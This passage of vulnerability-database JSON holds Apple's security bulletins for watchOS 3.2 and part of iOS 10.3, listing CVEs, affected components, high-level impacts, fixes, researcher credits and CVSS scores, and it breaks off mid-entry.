"CVE-2016-9643", "CVE-2017-2379", "CVE-2017-2390", "CVE-2017-2401", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2467", "CVE-2017-2471", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2478", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-5029"], "modified": "2017-03-27T00:00:00", "id": "APPLE:4D5D6CE943DE7279F91D23CD74879D4C", "href": "https://support.apple.com/kb/HT207602", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2020-12-24T20:41:17", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## watchOS 3.2\n\nReleased March 27, 2017\n\n**Audio**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. 
This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department, John Villamil, Doyensec\n\n**CoreGraphics**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: an anonymous researcher, Isaac Archambault of IDAoADI\n\n**FontParser**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform 
Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: All Apple Watch models\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HTTPProtocol**\n\nAvailable for: All Apple Watch models\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input 
validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: 
Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**libarchive**\n\nAvailable for: All Apple Watch models\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. 
This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: All Apple Watch models\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: All Apple Watch models\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. 
This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2471: Ivan Fratric of Google Project Zero\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-04T03:34:42", "title": "About the security content of watchOS 3.2 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 
"COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2430", "CVE-2016-9643", "CVE-2017-2461", "CVE-2017-2450", "CVE-2016-3619", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2379", "CVE-2017-2428", "CVE-2017-2471", "CVE-2017-2483", "CVE-2017-2456", "CVE-2017-2485", "CVE-2017-2451", "CVE-2017-2406", "CVE-2017-2474", "CVE-2017-2472", "CVE-2017-2390", "CVE-2017-2417", "CVE-2017-2462", "CVE-2017-2487", "CVE-2017-5029", "CVE-2017-2482", "CVE-2017-2458", "CVE-2017-2401", "CVE-2017-2467", "CVE-2017-2415", "CVE-2017-2490", "CVE-2017-2407", "CVE-2017-2473", "CVE-2017-2416", "CVE-2017-2440", "CVE-2017-2432", "CVE-2017-2478"], "modified": "2017-04-04T03:34:42", "id": "APPLE:HT207602", "href": "https://support.apple.com/kb/HT207602", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-26T19:33:06", "description": "# About the security content of iOS 10.3\n\nThis document describes the security content of iOS 10.3.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. 
You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iOS 10.3\n\nReleased March 27, 2017\n\n**Accounts**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A user may be able to view an Apple ID from the lock screen\n\nDescription: A prompt management issue was addressed by removing iCloud authentication prompts from the lock screen.\n\nCVE-2017-2397: Suprovici Vadim of UniApps team, an anonymous researcher\n\n**Audio**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. 
This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: John Villamil, Doyensec, riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: Isaac Archambault of IDAoADI, an anonymous 
researcher\n\n**DataAccess**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Configuring an Exchange account with a mistyped email address may resolve to an unexpected server\n\nDescription: An input validation issue existed in the handling of Exchange email addresses. This issue was addressed through improved input validation.\n\nCVE-2017-2414: Ilya Nesterov and Maxim Goncharov\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HomeKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Home Control may unexpectedly appear on Control Center\n\nDescription: A state issue existed in the handling of Home Control. 
This issue was addressed through improved validation.\n\nCVE-2017-2434: Suyash Narain of India\n\n**HTTPProtocol**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. 
This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**iTunes Store**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker in a privileged network position may be able to tamper with iTunes network traffic\n\nDescription: Requests to iTunes sandbox web services were sent in cleartext. This was addressed by enabling HTTPS.\n\nCVE-2017-2412: Richard Shupak (linkedin.com/in/rshupak)\n\n**JavaScriptCore**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2398: Lufeng Li of Qihoo 360 Vulcan Team\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: 
iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian 
Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. 
This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Pasteboard**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A person with physical access to an iOS device may read the pasteboard\n\nDescription: The pasteboard was encrypted with a key protected only by the hardware UID. This issue was addressed by encrypting the pasteboard with a key protected by the hardware UID and the user's passcode.\n\nCVE-2017-2399\n\n**Phone**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A third party app can initiate a phone call without user interaction\n\nDescription: An issue existed in iOS allowing for calls without prompting. 
This issue was addressed by prompting a user to confirm call initiation.\n\nCVE-2017-2484\n\n**Profiles**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker may be able to exploit weaknesses in the DES cryptographic algorithm\n\nDescription: Support for the 3DES cryptographic algorithm was added to the SCEP client and DES was deprecated.\n\nCVE-2017-2380: an anonymous researcher\n\n**Quick Look**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Tapping a tel link in a PDF document could trigger a call without prompting the user\n\nDescription: An issue existed when checking the tel URL before initiating calls. This issue was addressed with the addition of a confirmation prompt.\n\nCVE-2017-2404: Tuan Anh Ngo (Melbourne, Australia), Christoph Nehring\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A state management issue was addressed by disabling text input until the destination page loads.\n\nCVE-2017-2376: an anonymous researcher, Michal Zalewski of Google Inc, Muneaki Nishimura (nishimunea) of Recruit Technologies Co., Ltd., Chris Hlady of Google Inc, an anonymous researcher, Yuyang Zhou of Tencent Security Platform Department (security.tencent.com)\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A local user may be able to discover websites a user has visited in Private Browsing\n\nDescription: An issue existed in SQLite deletion. 
This issue was addressed through improved SQLite cleanup.\n\nCVE-2017-2384\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may present authentication sheets over arbitrary web sites\n\nDescription: A spoofing and denial-of-service issue existed in the handling of HTTP authentication. This issue was addressed through making HTTP authentication sheets non-modal.\n\nCVE-2017-2389: ShenYeYinJiu of Tencent Security Response Center, TSRC\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website by clicking a link may lead to user interface spoofing\n\nDescription: A spoofing issue existed in the handling of FaceTime prompts. This issue was addressed through improved input validation.\n\nCVE-2017-2453: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**Safari Reader**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Enabling the Safari Reader feature on a maliciously crafted webpage may lead to universal cross site scripting\n\nDescription: Multiple validation issues were addressed through improved input sanitization.\n\nCVE-2017-2393: Erling Ellingsen\n\n**SafariViewController**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Cache state is not properly kept in sync between Safari and SafariViewController when a user clears Safari cache\n\nDescription: An issue existed in clearing Safari cache information from SafariViewController. 
This issue was addressed by improving cache state handling.\n\nCVE-2017-2400: Abhinav Bansal of Zscaler, Inc.\n\n**Sandbox Profiles**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: A malicious application may be able to access the iCloud user record of a signed in user\n\nDescription: An access issue was addressed through additional sandbox restrictions on third party applications.\n\nCVE-2017-6976: George Dan (@theninjaprawn)\n\nEntry added August 1, 2017\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Validating empty signatures with SecKeyRawVerify() may unexpectedly succeed\n\nDescription: A validation issue existed with cryptographic API calls. This issue was addressed through improved parameter validation.\n\nCVE-2017-2423: an anonymous researcher\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. 
This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**Siri**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Siri might reveal text message contents while the device is locked\n\nDescription: An insufficient locking issue was addressed with improved state management.\n\nCVE-2017-2452: Hunter Byrnes\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Dragging and dropping a maliciously crafted link may lead to bookmark spoofing or arbitrary code execution\n\nDescription: A validation issue existed in bookmark creation. This issue was addressed through improved input validation.\n\nCVE-2017-2378: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed through improved state management.\n\nCVE-2017-2486: redrain of light4freedom\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: 